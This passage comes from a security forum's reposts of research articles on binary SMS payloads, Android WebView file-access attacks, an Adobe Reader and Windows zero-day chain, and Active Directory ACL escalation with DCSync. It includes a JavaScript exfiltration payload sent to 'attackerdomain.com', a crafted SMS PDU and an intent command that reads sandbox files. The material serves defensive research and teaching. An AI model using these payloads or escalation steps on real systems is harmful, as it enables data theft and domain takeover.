which sits between the PDU header and User Data (UD) and is declared early on with the User Data Header Indicator (UDHI) flag in the first octet. The UDH is also where Concatenated SMS (C-SMS) fragments are described. SMS allows for large (binary) payloads to be chunked up and sent as separate messages, not necessarily in sequence. This allows for up to 35,700 bytes of custom data to be sent to an application on a handset as 255 texts (Warning: You get billed per SMS). To chunk up a large message, it must first be split up into user data fragments not more than 140 octets each. A concatenated fragment is indicated via the UDHI flag in the first byte which indicates the first few bytes of the UD are fragment information which is used to reassemble the fragments later in order. Each fragment would be sent, preceded by the SMSC header, destination number, and the Protocol Identifier (PID) and Data Coding scheme (DCS) bytes. The fragment header contains the fragment count, a unique byte which serves as a batch identifier for all the fragments as well as the total number of fragments. Example UDH declaring 16 bit port addressing AND concatenation: 0A050B8457320003FF0201 0A: UDH length minus length field: 10 05: 16 bit application port addressing (Next four octets) 0B84: Destination port: 2948 (WAP push) 5732: Source port: 1664 00: Concatenated SMS 03: Information Element length for C-SMS section: 3 FF: Unique message identifier: 255 02: Fragments total: 2 01: This fragment: 1 For more UDH options see the 3GPP 23.040 standard. Hello World! SMS-SUBMIT PDU This PDU to MSISDN +441234567890 has the 'immediate display' flag set so will pop up as a flash SMS on the recipient's handset: 01000C9144214365870900000CC8329BFD065DDF72363904 Bear in mind that data encoding varies between sections. Some sections are special bit-masks, some are GSM 7 bit encoded and some are just plain old hexadecimal. 01: SMS-SUBMIT with default flags (Bitmask) 00: Message type 0 (bits 0-1)Reject duplicates flag set (bit 2) (Bitmask) 0C: Recipient length 12 digits (0x0C) 91: International ISDN/Telephone numbering plan (Bitmask) 442143658709: Recipient MSISDN (+441234567890) (GSM 7 bit encoding) 0000: Protocol identifier 0: Plain old SMS, Data Coding Scheme 0: Flash message (Bit mask) CC8329BFD065DDF72363904: User data: Hello World! (GSM 7 bit encoding) GSM interfaces on phones don't have firewalls With an Android phone you would see the following activity in the log when an SMS PDU is received. This shows the Radio Interface Layer (RIL) notifying the kernel of an incoming unsolicited PDU of length 168 (21 bytes). The full PDU is written to a SQLITE database, an automatic acknowledgement is sent (SMS-DELIVER-ACK) back to the network and finally the PDU is delivered to Android's privileged SMS receiver for onward processing, in this case to the message store although it could be routed to a listening application if a destination port is specified in the UDH. The only check is within the SmsHandler() which checks if SMS messages are allowed. There is no concept of packet inspection or port filters like an IP firewall. adb logcat -b radio I/RILC ( 2139): RIL_SOCKET_1 UNSOLICITED: UNSOL_RESPONSE_NEW_SMS length:168D/RILJ ( 2988): [UNSL]< UNSOL_RESPONSE_NEW_SMS [SUB0]D/GsmInboundSmsHandler( 2988): IdleState.processMessage:1D/GsmInboundSmsHandler( 2988): Idle state processing message type 1D/GsmInboundSmsHandler( 2988): acquired wakelock, leaving Idle stateD/GsmInboundSmsHandler( 2988): entering Delivering stateD/GsmInboundSmsHandler( 2988): DeliveringState.processMessage:1D/GsmInboundSmsHandler( 2988): isSMSBlocked=falseD/GsmInboundSmsHandler( 2988): URI of new row -> content://raw/1D/RILJ ( 2988): [9382]> SMS_ACKNOWLEDGE true 0 [SUB0]D/GsmInboundSmsHandler( 2988): DeliveringState.processMessage:2D/RILC ( 2139): SOCKET RIL_SOCKET_1 REQUEST: SMS_ACKNOWLEDGE length:20D/GsmInboundSmsHandler( 2988): Delivering SMS to: com.android.mms com.android.mms.transaction.PrivilegedSmsReceiver Targeting port 2948 with random data In this example, an SMS-SUBMIT containing 1000 characters of malformed WBXML has been concatenated as 7 fragments and targeted at a the WAP push application listening on port 2948.Because of the port number, an assumption about the data type of the payload is made (WBXML). This could be any binary data addressed to any port. PDU bytes: 41000C9144214365870900009B0B05040B8457320003FF0201C2E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E17018 41: SMS-SUBMIT with a user data header (Bitmask), Reject duplicates flag set (bit 2), User Data Header flag set (bit 3) 00: Message type 0 (bits 0-1) Immediate display 0C: Recipient length 12 digits (0x0C) 91: International ISDN/Telephone numbering plan (Bitmask) 442143658709: Recipient MSISDN (+441234567890 encoded as 7-bit ASCII) 0000: PID: 0, DCS: 0 9B: User data length (including UDH): 155 0B05040B8457320003FF0201:User Data Header (UDH). Length: 0x0B 16 bit port addressing: 0x05 Four octets long: 0x04 Destination port: 0x0B84 Source port: 0x5732 Concatenated SMS: 0x00 Three octets long: 0x03 Sequence identifier: 0xFF Total fragments: 0x02 This fragment: 0x01 C2E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E170381C0E87C3E1703 81C0E87C3E170381C0E87C3E17018:User Data. Malformed WBXML composed of repeat sequence of letter 'a'. Conclusion SMS is a weak link in a handset's security. With it you can interact, remotely, with an application on someone's phone when the phone is not connected to the internet. Significantly it has no firewall so bad packets are always forwarded. Despite being an old specification it has received much less scrutiny than Internet Protocol for example and many applications (and non-conventional devices now) handle SMS PDUs with a greater level of trust than they afford IP packets for comparison. In our next SMS blog we'll employ these concepts to attack the application layer on a phone remotely... Contact and Follow-up Alex is a senior researcher based in Context's Cheltenham office. He has over 15 years' experience of engineering and analysing RF systems and protocols and specialises in electronic warfare and RF propagation. See the contact page for how to get in touch. Sursa: https://www.contextis.com/blog/binary-sms-the-old-backdoor-to-your-new-thing
      • 2
      • Thanks
  17. HOW TO DETERMINE THE LOCATION OF A MOBILE SUBSCRIBER Sergey Puzankov In mobile networks, rather specific attacks are possible. In this article, I will consider a real-time attack that allows one to detect a cell where a subscriber is located. I cannot specify the method accuracy in more common units of measurement, because cell coverage areas greatly vary based on the terrain. In a densely built-over urban area, a cell could cover several hundred meters. However, on an intercity highway in the wild, a cell might only cover several kilometers. Download: https://www.ptsecurity.com/upload/iblock/8c0/8c065c70984c93d3001234ed6e6d865b.pdf
      • 1
      • Upvote
  18. Prototype pollution attack Abstract Prototype pollution is a term that was coined many years ago in the JavaScript community to designate libraries that added extension methods to the prototype of base objects like "Object", "String" or "Function". This was very rapidly considered a bad practice as it introduced unexpected behavior in applications. In this presentation, we will analyze the problem of prototype pollution from a different angle. What if an attacker could pollute the prototype of the base object with his own value? What APIs allow such pollution? What can be done with it? Paper Link to paper Slides Link to slides Sursa: https://github.com/HoLyVieR/prototype-pollution-nsec18
  19. How do we Stop Spilling the Beans Across Origins? A primer on web attacks via cross-origin information leaks and speculative execution aaj@gxxgle.com, mkwst@gxxgle.com Intro Browsers do their best to enforce a hard security boundary on an origin-by-origin basis. To vastly oversimplify, applications hosted at distinct origins must not be able to read each other's data or take action on each other’s behalf in the absence of explicit cooperation. Generally speaking, browsers have done a reasonably good job at this; bugs crop up from time to time, but they're well-understood to be bugs by browser vendors and developers, and they're addressed promptly. The web platform, however, is designed to encourage both cross-origin communication and inclusion. These design decisions weaken the borders that browsers place around origins, creating opportunities for side-channel attacks (pixel perfect, resource timing, etc.) and server-side confusion about the provenance of requests (CSRF, cross-site search). Spectre and related attacks based on speculative execution make the problem worse by allowing attackers to read more memory than they're supposed to, which may contain sensitive cross-origin responses fetched by documents in the same process. Spectre is a powerful attack technique, but it should be seen as a (large) iterative improvement over the platform's existing side-channels. This document reviews the known classes of cross-origin information leakage, and uses this categorization to evaluate some of the mitigations that have recently been proposed ( CORB , From-Origin , Sec-Metadata / Sec-Site , SameSite cookies and Cross-Origin-Isolate ). We attempt to survey their applicability to each class of attack, and to evaluate developers' ability to deploy them properly in real-world applications. Ideally, we'll be able to settle on mitigation techniques which are both widely deployable, and broadly scoped. Sursa: https://www.arturjanc.com/cross-origin-infoleaks.pdf
  20. Main Articles Advisories Tools About May 15, 2018 Reviewing Android Webviews fileAccess attack vectors. Introduction WebViews are a crucial part of many mobile applications and there are some security aspects that need to be taken into account when using them. File access is one of those aspects. For the implementation of some checks in our security tool Droidstatx, I’ve spent some time understanding all the details and noticed that not all attack vectors are very clear, specially in their requirements. WebView file access is enabled by default. Since API 3 (Cupcake 1.5) the method setAllowFileAccess() is available for explicitly enabling or disabling it. A WebView with file access enabled will be able to access all the same files as the embedding application, such as the application sandbox (located in /data/data/<package_name>), /etc, /sdcard, among others. Above API 19(KitKat 4.4 - 4.4.4), the app will need the android.permission.READ_EXTERNAL_STORAGE permission. The WebView needs to use a File URL Scheme, e.g., file://path/file, to access the file. Another important detail is that WebViews have Javascript disabled by default. The method setJavaScriptEnabled() is available for explicitly enabling or disabling it.. Before going into details regarding the type of attack vectors that are made possible with file access, one needs to be aware of another concept, Same Origin Policy (SOP): A web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. An origin is defined as a combination of URI scheme, host name, and port number. in https://en.wikipedia.org/wiki/Same-origin_policy As an example, the URLs https://www.integrity.pt and file://etc/hosts do not have the same origin since they won’t match in: Scheme: HTTPS vs file Authority: www.integrity.pt vs etc/hosts This means that a file request in the context of the https://www.integrity.pt loaded contents will be considered a Cross Origin Request (COR). Attack Vectors So we have a WebView with file access. Now what? As an attacker we want data exfiltration and this is what motivated me to write this article because there are details that can invalidate this type of attack. Scenario 1: App with WebView that loads resources which the attacker is able to intercept and manipulate. Javascript enabled. In this scenario, an attacker is able to intercept the communication of the app and is able to manipulate the content. Our goal is to exfiltrate content from the app so our best option is to use Javascript to do so. Using an XMLHttpRequest seems the best way to do that. The attacker can try and replace the content returned to the app with a Javascript payload that would seemingly allow to exfiltrate files: var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { window.location.replace('https://attackerdomain.com/?exfiltrated='+xhr.responseText); } } xhr.open('GET', 'file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt', true); xhr.send(null); The attacker will be able to see the HTTP request but without exfiltrated data. If we look into the system logs we discover why. 05-09 12:38:59.306 27768 27768 I chromium: [INFO:CONSOLE(20)] “Failed to load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt: Cross origin requests are only supported for protocol schemes: http, data, chrome, https.”, source: https://labs.integrity.pt/ (20) On earlier API versions like 15 (Ice Cream Sandwich 4.0.3 - 4.0.4) a similar error is returned: Console: XMLHttpRequest cannot load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt. Cross origin requests are only supported for HTTP. null:1 Console: Uncaught Error: NETWORK_ERR: XMLHttpRequest Exception 101 https://labs.integrity.pt/:39 So even with file access enabled in the WebView, due to the fact that the file scheme request is considered a Cross Origin Request and hence disallowed, the attacker will not be able to exfiltrate files this way. Scenario 2: App with WebView that loads local HTML files via file scheme with external resources which the attacker is able to intercept and manipulate. Javascript enabled. In this scenario, the HTML files are stored locally in the APK and are loaded via file scheme, but some resources are loaded externally. There is a very important property called UniversalAccessFromFileURLs that allows SOP bypass. This property indicates whether Javascript running in the context of a file scheme can access content from any origin. This property is enabled by default below API 16 (Jelly Bean 4.1.x) and there is no way to disable it on those API levels [1]. In API 16 (Jelly Bean 4.1.x) and afterwards the property is disabled by default. The method setAllowUniversalAccessFromFileURLs() was also made available to explicitly enable or disable this feature. Using the same Javascript payload, the attack will succeed in devices that are running on API 15 and below, or in apps that explicitly enable the property using the method setAllowUniversalAccessFromFileURLs(). The attack succeeds due to the fact that the app is running Javascript in the context of an HTML file loaded with a file scheme and the UniversalAccessFromFileURLs property is enabled, allowing SOP bypass. Scenario 3: App with exported component that opens URLs via Intent. Backup disabled. Access to External Storage. In this scenario, the app has an exported activity, then receives URLs via Intents, and opens the respective URL. This is very common in apps that are using Deep Links. When intent-filters are not correctly implemented this can cause security issues. The app also has Backup disabled, preventing an attacker to obtain access to the app’s sandbox content via the backup file. Here the attack vectors are a bit trickier and far-fetched, but still possible. Scenario 3 - Physical Attack One possible attack vector is someone that has physical access to a unlocked device, already knows in advanced the structure of the vulnerable app (consider an hypothetical well known app, with a large user base), and session cookies or plaintext credentials are stored in the app’s sandbox. The attacker can install a custom app sending a targeted Intent for the file with sensitive information or install a terminal emulator from Google Play and type in the following command: am start -n pt.integrity.labs.webview_intents/.ExportedActivity –es url “file:///data/data/pt.integrity.labs.webview_intents/files/sandbox_file.txt” This will trigger the vulnerable app and the WebView is going to show the content of the sensitive file on the screen. Without rooting the device it is possible to obtain access to the content of the app’s sandbox. Scenario 3 - Malicious App This attack requires that the vulnerable app is running on a device below API 16 or the app has explicitly enabled UniversalAccessFromFileURLs An attacker lures the user to install a malicious app that only needs android.permission.INTERNET and android.permission.READ_EXTERNAL_STORAGE permissions. When started, the malicious app creates an HTML file in the external storage with a Javascript payload identical to the one used in scenarios 1 and 2. Afterwards, it sends an Intent to the vulnerable app containing the URL of the local HTML (previously created in the external storage). This will allow it to exfiltrate the information from inside the vulnerable app’s sandbox like in scenario 2. Test Apps I’ve created the apps for all scenarios so you can play around and test this for yourselves. Scenario 1 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_remote_scenario1.apk Scenario 2 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_local_scenario2.apk Scenario 3 - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_intents_scenario3.apk Scenario 3 Exploit App - https://github.com/integrity-sa/android-webviews-fileaccess/blob/master/webview_intents_scenario3_exploit.apk Note1: All apps have broken TLS implementation so it’s easier to intercept the communication. If using Burp Suite, for scenario 2, ensure that you adjust the Intercept Client Requests rules so that you can intercept Javascript content. Note2: While exploring the vulnerability in Scenario 2 and 3 (both vulnerable app and exploit) you will need to clear the data (Settings->Apps->App->Clear Data) when trying to repeat the attack. Note3: On Scenario 3 Malicious App, start the vulnerable app a first time and only then run the exploit app. Conclusion WebViews with file access enabled can have a big impact in a particular application’s security but, by itself, a WebView with file access enabled does not guarantee a practical way to exfiltrate files from the system. For the attack to work it is required that the app is running on a device with API level < 16 and/or the app developer improperly used the Android platform as demonstrated in some of the scenarios above. These were the attack vectors that I could identify but if I missed a particular one, I would love to discuss it and add it here. Ping me at https://twitter.com/clviper. Recommendations: Ensure that all external external resources loaded by a WebView are using TLS and the app has a correct TLS implementation. Ensure that all exported components that might need to receive intents and trigger a WebView to open that URL are correctly filtered by using intent-filters and a data element for a fine filter of the allowed URIs. Ensure that all WebViews explicitly disable file access when not a requirement by using the method setAllowFileAccess(). In API Level >=16, when not a requirement, ensure that no WebView enables the UniversalAccessFromFileURLs by using the method setAllowUniversalAccessFromFileURLs(). References https://en.wikipedia.org/wiki/Same-origin_policy https://source.android.com/setup/start/build-numbers https://developer.android.com/reference/android/webkit/WebView https://developer.android.com/reference/android/webkit/WebSettings https://developer.android.com/guide/components/intents-filters https://developer.android.com/guide/topics/manifest/data-element https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#testing-webview-protocol-handlers Notes [1] Currently the Android developer documentation has the following paragraph: To prevent possible violation of same domain policy when targeting ICE_CREAM_SANDWICH_MR1 and earlier, you should explicitly set this value to false. I’ve opened an issue on google issue tracker, since this paragraph needs to be adjusted. The public method setAllowUniversalAccessFromFileURLs() was only implemented in API 16, so it is not possible to use this method in API 15 (ICE_CREAM_SANDWICH_MR1) and earlier. Thank you Special thank you to pmsac and morisson for the post review. Written by Cláudio André Sursa: https://labs.integrity.pt/articles/review-android-webviews-fileaccess-attack-vectors/
  21. A tale of two zero-days Double zero-day vulnerabilities fused into one. A mysterious sample enables attackers to execute arbitrary code with the highest privileges on intended targets Anton Cherepanov 15 May 2018 - 02:58PM Share Late in March 2018, ESET researchers identified an interesting malicious PDF sample. A closer look revealed that the sample exploits two previously unknown vulnerabilities: a remote-code execution vulnerability in Adobe Reader and a privilege escalation vulnerability in Microsoft Windows. The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year. Once the PDF sample was discovered, ESET contacted and worked together with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs. Patches and advisories from Adobe and Microsoft are available here: APSB18-09 CVE-2018-8120 The affected product versions are the following: Acrobat DC (2018.011.20038 and earlier versions) Acrobat Reader DC (2018.011.20038 and earlier versions ) Acrobat 2017 (011.30079 and earlier versions) Acrobat Reader DC 2017 (2017.011.30079 and earlier versions) Acrobat DC (Classic 2015) (2015.006.30417 and earlier versions) Acrobat Reader DC (Classic 2015) (2015.006.30417 and earlier versions) Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for Itanium-Based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 This blog covers technical details of the malicious sample and the vulnerabilities it exploited. Introduction PDF (Portable Document Format) is a file format for electronic documents and as with other popular document formats, it can be used by attackers to deliver malware to a victim’s computer. In order to execute their own malicious code, attackers have to find and exploit vulnerabilities in PDF viewer software. There are several PDF viewers; one very popular viewer is Adobe Reader. The Adobe Reader software implements a security feature called a sandbox, also known in the viewer as Protected Mode. The detailed technical description of the sandbox implementation was published on Adobe’s blog pages in four parts (Part 1, Part 2, Part 3, Part 4). The sandbox makes the exploitation process harder: even if code execution is achieved, the attacker still would have to bypass the sandbox’s protections in order to compromise the computer running Adobe Reader. Usually, sandbox bypass is achieved by exploiting a vulnerability in the operating system itself. This is a rare case when the attackers were able to find vulnerabilities and write exploits for the Adobe Reader software and the operating system. CVE-2018-4990 – RCE in Adobe Reader The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed. At the beginning of exploitation, the JavaScript code starts to manipulate the Button1 object. This object contains a specially crafted JPEG2000 image, which triggers a double-free vulnerability in Adobe Reader. Figure 1. JavaScript code that manipulates the Button1 object The JavaScript uses heap-spray techniques in order to corrupt internal data structures. After all these manipulations the attackers achieve their main goal: read and write memory access from their JavaScript code. Figure 2. JavaScript code used for reading and writing memory Using these two primitives, the attacker locates the memory address of the EScript.api plugin, which is the Adobe JavaScript engine. Using assembly instructions (ROP gadgets) from that module, the malicious JavaScript sets up a ROP chain that would lead to the execution of native shellcode. Figure 3. Malicious JavaScript that builds a ROP chain As the final step, the shellcode initializes a PE file embedded in the PDF and passes execution to it. CVE-2018-8120 – Privilege escalation in Microsoft Windows After having exploited the Adobe Reader vulnerability, the attacker has to break the sandbox. This is exactly the purpose of the second exploit we are discussing. The root cause of this previously unknown vulnerability is located in the NtUserSetImeInfoEx function of the win32k Windows kernel component. Specifically, the SetImeInfoEx subroutine of NtUserSetImeInfoEx does not validate a data pointer, allowing a NULL pointer dereference. Figure 4. Disassembled SetImeInfoEx routine As is evident in Figure 4, the SetImeInfoEx function expects a pointer to an initialized WINDOWSTATION object as the first argument. The spklList could be equal to zero if the attacker creates a new window station object and assigns it to the current process in user-mode. Thus, by mapping the NULL page and setting a pointer to offset 0x2C, the attacker can leverage this vulnerability to write to an arbitrary address in the kernel space. It should be noted that since Windows 8, a user process is not allowed to map the NULL page. Since the attacker has arbitrary write primitive they could use different techniques, but in this case, the attacker chooses to use a technique described by Ivanlef0u and Mateusz “j00ru” Jurczyk and Gynvael Coldwin. The attacker sets up a call gate to Ring 0 by rewriting the Global Descriptor Table (GDT). To do so an attacker gets the address of the original GDT using the SGDT assembly instruction, constructs their own table and then rewrites the original one using the above-mentioned vulnerability. Then the exploit uses the CALL FAR instruction to perform an inter-privilege level call. Figure 5. The disassembled CALL FAR instruction Once the code is executed in kernel mode, the exploit replaces the token of the current process with the system token. Conclusion Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages. Even though the sample does not contain a real malicious final payload, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing. Indicators of Compromise (IoC) ESET detection names JS/Exploit.Pdfka.QNV trojan Win32/Exploit.CVE-2018-8120.A trojan SHA-1 hashes C82CFEAD292EECA601D3CF82C8C5340CB579D1C6 0D3F335CCCA4575593054446F5F219EBA6CD93FE Anton Cherepanov 15 May 2018 - 02:58PM Sursa: https://www.welivesecurity.com/2018/05/15/tale-two-zero-days/
  22. Binary Exploitation Any Doubt...? Let's Discuss Introduction I am quite passionate about exploiting binary files. First time when I came across Buffer Overflow(a simple technique of exploitation) then I was not able to implement the same with the same copy of code on my system. The reason for that was there was no consolidated document that would guide me thoroughly to write a perfect exploit payload for the program in case of system changes. Also there are very few descriptive blogs/tutorials that had helped me exploiting a given binary. I have come up with consolidation of Modern exploitation techniques (in the form of tutorial) that will allow you to understand exploitation from scratch. I will be using vagrant file to setup the system on virtual box. To do the same in your system follow: vagrant up vagrant ssh Topics Lecture 1. Memory Layout of C program. ELF binaries. Overview of stack during function call. Assembly code for the function call and return. Concept of $ebp and $esp. Executable memory. Lecture 1.5. How Linux finds the binaries utilis? Simple exploit using Linux $PATH variable. Lecture 2. What are stack overflows? ASLR (basics), avoiding Stack protection. Shellcodes Buffer overflow: Changing Control of the program to return to some other function Shellcode injection in buffer and spawning the shell Lecture 3. Shellcode injection with ASLR enabled. Environment variables. Lecture 3.5 Return to Libc attacks. Spawning shell in non executable stack Stack organization in case ret2libc attack. Lecture 4. This folder contains the set of questions to exploit binaries on the concept that we have learned so far. Lecture 5. What is format string Vulnerability? Seeing the content of stack. Writing onto the stack. Writing to arbitrary memory location. Lecture 6. GOT Overriding GOT entry. Spawning shell with format string vuln. Sursa: https://github.com/r0hi7/BinExp
      • 1
      • Upvote
  23. Escalating privileges with ACLs in Active Directory Posted on April 26, 2018 by rindertkramer 6 Votes Researched and written by Rindert Kramer and Dirk-jan Mollema Introduction During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a few hours. Contributing to this are insufficient system hardening and the use of insecure Active Directory defaults. In such scenarios publicly available tools help in finding and exploiting these issues and often result in obtaining domain administrative privileges. This blogpost describes a scenario where our standard attack methods did not work and where we had to dig deeper in order to gain high privileges in the domain. We describe more advanced privilege escalation attacks using Access Control Lists and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx that automate the steps for this advanced attack. AD, ACLs and ACEs As organizations become more mature and aware when it comes to cyber security, we have to dig deeper in order to escalate our privileges within an Active Directory (AD) domain. Enumeration is key in these kind of scenarios. Often overlooked are the Access Control Lists (ACL) in AD.An ACL is a set of rules that define which entities have which permissions on a specific AD object. These objects can be user accounts, groups, computer accounts, the domain itself and many more. The ACL can be configured on an individual object such as a user account, but can also be configured on an Organizational Unit (OU), which is like a directory within AD. The main advantage of configuring the ACL on an OU is that when configured correctly, all descendent objects will inherit the ACL.The ACL of the Organizational Unit (OU) wherein the objects reside, contains an Access Control Entry (ACE) that defines the identity and the corresponding permissions that are applied on the OU and/or descending objects.The identity that is specified in the ACE does not necessarily need to be the user account itself; it is a common practice to apply permissions to AD security groups. By adding the user account as a member of this security group, the user account is granted the permissions that are configured within the ACE, because the user is a member of that security group. Group memberships within AD are applied recursively. Let’s say that we have three groups: Group_A Group_B Group_C Group_C is a member of Group_B which itself is a member of Group_A. When we add Bob as a member of Group_C, Bob will not only be a member of Group_C, but also be an indirect member of Group_B and Group_A. That means that when access to an object or a resource is granted to Group_A, Bob will also have access to that specific resource. This resource can be an NTFS file share, printer or an AD object, such as a user, computer, group or even the domain itself. Providing permissions and access rights with AD security groups is a great way for maintaining and managing (access to) IT infrastructure. However, it may also lead to potential security risks when groups are nested too often. As written, a user account will inherit all permissions to resources that are set on the group of which the user is a (direct or indirect) member. If Group_A is granted access to modify the domain object in AD, it is quite trivial to discover that Bob inherited these permissions. However, if the user is a direct member of only 1 group and that group is indirectly a member of 50 other groups, it will take much more effort to discover these inherited permissions. Escalating privileges in AD with Exchange During a recent penetration test, we managed to obtain a user account that was a member of the Organization Management security group. This group is created when Exchange is installed and provided access to Exchange-related activities. Besides access to these Exchange settings, it also allows its members to modify the group membership of other Exchange security groups, such as the Exchange Trusted Subsystem security group. This group is a member of the Exchange Windows Permissions security group. By default, the Exchange Windows Permissions security group has writeDACL permission on the domain object of the domain where Exchange was installed. 1 The writeDACL permissions allows an identity to modify permissions on the designated object (in other words: modify the ACL) which means that by being a member of the Organization Management group we were able to escalate out privileges to that of a domain administrator. To exploit this, we added our user account that we obtained earlier to the Exchange Trusted Subsystem group. We logged on again (because security group memberships are only loaded during login) and now we were a member of the Exchange Trusted Subsystem group and the Exchange Windows Permission group, which allowed us to modify the ACL of the domain. If you have access to modify the ACL of an AD object, you can assign permissions to an identity that allows them to write to a certain attribute, such as the attribute that contains the telephone number. Besides assigning read/write permissions to these kinds of attributes, it is also possible to assign permissions to extended rights. These rights are predefined tasks, such as the right of changing a password, sending email to a mailbox and many more2. It is also possible to add any given account as a replication partner of the domain by applying the following extended rights: Replicating Directory Changes Replicating Directory Changes All When we set these permissions for our user account, we were able to request the password hash of any user in the domain, including that of the krbtgt account of the domain. More information about this privilege escalation technique can be found on the following GitHub page: https://github.com/gdedrouas/Exchange-AD-Privesc Obtaining a user account that is a member of the Organization Management group is not something that happens quite often. Nonetheless, this technique can be used on a broader basis. It is possible that the Organization Management group is managed by another group. That group may be managed by another group, et cetera. That means that it is possible that there is a chain throughout the domain that is difficult to discover but, if correlated correctly, might lead to full compromise of the domain. To help exploit this chain of security risks, Fox-IT wrote two tools. The first tool is written in PowerShell and can be run within or outside an AD environment. The second tool is an extension to the ntlmrelayx tool. This extension allows the attacker to relay identities (user accounts and computer accounts) to Active Directory and modify the ACL of the domain object. Invoke-ACLPwn Invoke-ACLPwn is a Powershell script that is designed to run with integrated credentials as well as with specified credentials. The tool works by creating an export with SharpHound3 of all ACLs in the domain as well as the group membership of the user account that the tool is running under. If the user does not already have writeDACL permissions on the domain object, the tool will enumerate all ACEs of the ACL of the domain. Every identity in an ACE has an ACL of its own, which is added to the enumeration queue. If the identity is a group and the group has members, every group member is added to the enumeration queue as well. As you can imagine, this takes some time to enumerate but could end up with a chain to obtain writeDACL permission on the domain object. When the chain has been calculated, the script will then start to exploit every step in the chain: The user is added to the necessary groups Two ACEs are added to the ACL of the domain object: Replicating Directory Changes Replicating Directory Changes All Optionally, Mimkatz’ DCSync feature is invoked and the hash of the given user account is requested. By default the krbtgt account will be used. After the exploitation is done, the script will remove the group memberships that were added during exploitation as well as the ACEs in the ACL of the domain object. To test the script, we created 26 security groups. Every group was member of another group (testgroup_a was a member of testgroup_b, which itself was a member of testgroup_c, et cetera, up until testgroup_z.) The security group testgroup_z had the permission to modify the membership of the Organization Management security group. As written earlier, this group had the permission to modify the group membership of the Exchange Trusted Subsystem security group. Being a member of this group will give you the permission to modify the ACL of the domain object in Active Directory. We now had a chain of 31 links: Indirect member of 26 security groups Permission to modify the group membership of the Organization Management security group Membership of the Organization Management Permission to modify the group membership of the Exchange Trusted Subsystem security group Membership of the Exchange Trusted Subsystem and the Exchange Windows Permission security groups The result of the tool can be seen in the following screenshot: Please note that in this example we used the ACL configuration that was configured during the installation of Exchange. However, the tool does not rely on Exchange or any other product to find and exploit a chain. Currently, only the writeDACL permission on the domain object is enumerated and exploited. There are other types of access rights such as owner, writeOwner, genericAll, et cetera, that can be exploited on other object as well. These access rights are explained in depth in this whitepaper by the BloodHound team. Updates to the tool that also exploit these privileges will be developed and released in the future. The Invoke-ACLPwn tool can be downloaded from our GitHub here: https://github.com/fox-it/Invoke-ACLPwn NTLMRelayx Last year we wrote about new additions to ntlmrelayx allowing relaying to LDAP, which allows for domain enumeration and escalation to Domain Admin by adding a new user to the Directory. Previously, the LDAP attack in ntlmrelayx would check if the relayed account was a member of the Domain Admins or Enterprise Admins group, and escalate privileges if this was the case. It did this by adding a new user to the Domain and adding this user to the Domain Admins group. While this works, this does not take into account any special privileges that a relayed user might have. With the research presented in this post, we introduce a new attack method in ntlmrelayx. This attack involves first requesting the ACLs of important Domain objects, which are then parsed from their binary format into structures the tool can understand, after which the permissions of the relayed account are enumerated. This takes into account all the groups the relayed account is a member of (including recursive group memberships). Once the privileges are enumerated, ntlmrelayx will check if the user has high enough privileges to allow for a privilege escalation of either a new or an existing user. For this privilege escalation there are two different attacks. The first attack is called the ACL attack in which the ACL on the Domain object is modified and a user under the attackers control is granted Replication-Get-Changes-All privileges on the domain, which allows for using DCSync as desribed in the previous sections. If modifying the domain ACL is not possible, the access to add members to several high privilege groups in the domain is considered for a Group attack: Enterprise Admins Domain Admins Backup Operators (who can back up critical files on the Domain Controller) Account Operators (who have control over almost all groups in the domain) If an existing user was specified using the --escalate-user flag, this user will be given the Replication privileges if an ACL attack can be performed, and added to a high-privilege group if a Group attack is used. If no existing user is specified, the options to create new users are considered. This can either be in the Users container (the default place for user accounts), or in an OrganizationalUnit for which control was delegated to for example IT department members. One may have noticed that we mentioned relayed accounts here instead of relayed users. This is because the attack also works against computer accounts that have high privileges. An example for such an account is the computer account of an Exchange server, which is a member of the Exchange Windows Permissions group in the default configuration. If an attacker is in a position to convince the Exchange server to authenticate to the attacker’s machine, for example by using mitm6 for a network level attack, privileges can be instantly escalated to Domain Admin. The NTDS.dit hashes can now be dumped by using impacket’s secretsdump.py or with Mimikatz: Similarly if an attacker has Administrative privileges on the Exchange Server, it is possible to escalate privilege in the domain without the need to dump any passwords or machine account hashes from the system. Connecting to the attacker from the NT Authority\SYSTEM perspective and authenticating with NTLM is sufficient to authenticate to LDAP. The screenshot below shows the PowerShell function Invoke-Webrequest being called with psexec.py, which will run from a SYSTEM perspective. The flag -UseDefaultCredentials will enable automatic 